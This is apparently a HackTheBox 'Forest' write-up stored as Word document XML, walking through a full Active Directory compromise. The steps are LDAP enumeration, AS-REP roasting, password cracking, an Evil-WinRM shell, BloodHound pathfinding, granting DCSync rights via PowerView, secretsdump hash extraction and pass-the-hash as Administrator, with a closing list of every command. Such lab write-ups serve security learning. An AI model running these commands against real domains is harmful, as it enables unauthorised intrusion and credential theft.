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9FEF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox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FOREST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Active Directory — Penetration Test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10.129.95.210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htb.local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FOREST.htb.local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Server (AD Domain Controller)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Admin — full DC compromise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Kill Chain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Forest is a Domain Controller with Exchange installed and LDAP anonymous bind enabled. The chain exploits AS-REP Roasting on a service account without Kerberos pre-authentication, WinRM access using the obtained credentials, and a privilege escalation path through Account Operators → Exchange Windows Permissions → WriteDACL on the domain → DCSync. The final result is a dump of the NTLM hash of the Domain Administrator and full access to the DC.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anonymous bind + user enumeration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domain user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AS-REP Roasting (impacket-GetNPUsers)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KRB5ASREP hash for svc-alfresco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Hashcat / John (rockyou)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Cleartext password: s3rvice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Evil-WinRM with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as svc-alfresco (user flag)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BloodHound enumeration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Path: Account Operators → Exchange Windows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creation + group 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with WriteDACL on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Add-DomainObjectAcl (PowerView)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DCSync rights on new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impacket-secretsdump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NTLM hashes of all users including Administrator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Evil-WinRM Pass-the-Hash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as Administrator (root flag)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Reconnaissance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Nmap Full Port Scan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full scan reveals a typical Windows Domain Controller profile with Exchange installed: DNS (53), Kerberos (88), LDAP (389/3268), SMB (445), WinRM (5985). The absence of standard web ports (80/443) rules out any web attack surface — the entire machine is pure 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nmap -sV -p- 10.129.95.210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DNS Plus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Windows Kerberos — confirms DC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LDAP — Domain: htb.local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2008 R2-2012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WinRM (HTTP)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PowerShell access — post-exploit vector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GC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Catalog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NMF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/ AD Web Services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/etc/hosts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"10.129.95.210 htb.local FOREST.htb.local" | sudo tee -a /etc/hosts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LDAP Anonymous Bind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LDAP accepts anonymous connections and returns 312 objects — groups, users, OUs, Exchange configuration. Among the most interesting data is the Exchange Windows Permissions structure and related security groups, which will become central in the privilege escalation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ldapsearch -x -H ldap://10.129.95.210 -b "DC=htb,DC=local"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User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impacket-GetADUsers -all -dc-ip 10.129.95.210 htb.local/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Among the 31 accounts returned, 6 are real users (excluding Exchange system accounts): sebastien, lucinda, svc-alfresco, andy, mark, santi. svc-alfresco shows a PasswordLastSet updated to the same day — a hint of periodic automatic reset typical of service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users.txt &lt;&lt; EOF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sebastien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lucinda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svc-alfresco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santi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AS-REP Roasting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AS-REP Roasting is a Kerberos attack that requires no valid credentials. When an account has the UF_DONT_REQUIRE_PREAUTH flag active, the Domain Controller releases an AS-REP encrypted with material derived from the account's password — without the attacker needing to authenticate first. This ticket is crackable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impacket-GetNPUsers htb.local/ -usersfile users.txt -dc-ip 10.129.95.210 -no-pass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Only svc-alfresco returns a hash — all other accounts have pre-authentication enabled.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hash to file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'$krb5asrep$23$svc-alfresco@HTB.LOCAL:[hash]' &gt; hash.txt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Crack with John the Ripper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john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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Result: svc-alfresco : s3rvice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Initial Access — WinRM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WinRM (port 5985) is open and svc-alfresco is a member of Remote Management Users — sufficient condition to obtain an interactive PowerShell shell via Evil-WinRM.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evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice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whoami /all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svc-alfresco is member of: BUILTIN\Account Operators, HTB\Service Accounts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C:\Users\svc-alfresco\Desktop\user.txt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BloodHound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bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -dc FOREST.htb.local -ns 10.129.95.210 -c all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BloodHound collects LDAP data, sessions and ACLs of the domain to build a directed graph highlighting non-obvious privilege escalation paths. With svc-alfresco's credentials the collector retrieves 32 users, 76 groups, 2 computers and 20 containers.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Identified Path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Cypher query for the path from svc-alfresco to Exchange Windows Permissions reveals the complete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/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svc-alfresco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IT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IT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Operators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Operators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Windows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Windows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WriteDACL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htb.local (domain)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Account Operators has GenericAll on Exchange Windows Permissions — can freely add members. Exchange Windows Permissions has WriteDACL on the domain — can modify the ACLs of the domain object itself, including granting DCSync rights.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Privilege Escalation — DCSync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User Creation and Group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 user hacker Password123! /add /domain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 group "Exchange Windows Permissions" hacker /add /domain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DCSync Rights via PowerView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evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice -s /usr/share/windows-resources/powersploit/Recon/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WinRM with PowerView loaded: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PowerView.ps1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$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force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$Cred = New-Object System.Management.Automation.PSCredential('htb\hacker', $SecPassword)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Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hacker -Rights DCSync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DCSync with impacket-secretsdump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impacket-secretsdump 'htb/hacker:Password123!@10.129.95.210'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Administrator hash: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htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::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Pass-the-Hash — Domain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evil-winrm -i 10.129.95.210 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6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C:\Users\Administrator\Desktop\root.txt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Full Command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Setup hosts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"10.129.95.210 htb.local FOREST.htb.local" | sudo tee -a /etc/hosts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Nmap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nmap -sV -p- 10.129.95.210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LDAP dump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ldapsearch -x -H ldap://10.129.95.210 -b "DC=htb,DC=local"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Enumerate users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impacket-GetADUsers -all -dc-ip 10.129.95.210 htb.local/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AS-REP Roasting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impacket-GetNPUsers htb.local/ -usersfile users.txt -dc-ip 10.129.95.210 -no-pass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Crack hash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john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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WinRM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evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice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8. BloodHound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bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -dc FOREST.htb.local -ns 10.129.95.210 -c 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9. Create user + add to group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 user hacker Password123! /add /domain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 group "Exchange Windows Permissions" hacker /add /domain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10. DCSync rights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(inside WinRM with PowerView)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Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hacker -Rights DCSync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11. DCSync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impacket-secretsdump 'htb/hacker:Password123!@10.129.95.210'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12. Pass-the-Hash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evil-winrm -i 10.129.95.210 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6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2026-05-05T17:55:52.354Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-05T17:55:52.354Z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